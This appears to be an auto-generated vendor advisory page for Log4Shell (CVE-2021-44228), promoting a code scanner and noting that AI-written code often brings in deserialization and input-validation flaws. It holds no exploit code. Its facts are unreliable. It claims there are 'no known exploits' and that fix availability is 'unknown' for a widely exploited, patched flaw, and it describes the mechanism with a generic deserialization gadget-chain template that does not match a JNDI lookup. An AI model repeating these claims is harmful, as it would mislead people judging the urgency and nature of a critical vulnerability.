Log4Shell
Remote code execution via JNDI lookup in log messages
Severity CVSS
CRITICAL 10
Exploitation Shoulder
No known exploits
Fix available
Unknown
Should I care?
This matters if:
- Apps deserializing data from untrusted sources
- APIs accepting serialized objects (JSON, XML, YAML)
- Apps using expression languages (OGNL, SpEL, EL) with user input
- Template engines that evaluate expressions
- Apps processing complex user input (files, forms, APIs)
- Endpoints without schema validation
Not relevant if:
- You only deserialize data from trusted internal services
- Input schemas are strictly validated
- No expression language evaluation in your code
- All expressions are pre-compiled and static
- All inputs are validated against schemas
- You use strict type checking at boundaries
How it breaks apps
1
Untrusted data is deserialized
2
Malicious object is instantiated
3
Gadget chain triggers execution
4
Remote code execution
Is this in your code?
Shoulder scans your codebase and tells you if CVE-2021-44228 is reachable — not just present.
npx @shoulderdev/cli trust .
Technical details
Risk by Environment
Production (public-facing)
HIGH
Patch soon. Exploitation requires specific conditions but impact is severe.
Staging
MEDIUM
Schedule patch. Review if this environment is network-accessible.
Internal services
MEDIUM
Assess exposure. Patch if the service handles sensitive data.
Local dev only
LOW
Minimal risk in isolated dev environments.
AI Development Risk
This vulnerability pattern is commonly introduced when AI generates code.
CWE-502
Deserialization of untrusted data
LLMs frequently generate code that deserializes data without validation. AI-scaffolded APIs often trust input formats implicitly.
CWE-20
Improper input validation
LLMs routinely skip input validation, trusting that callers will provide well-formed data.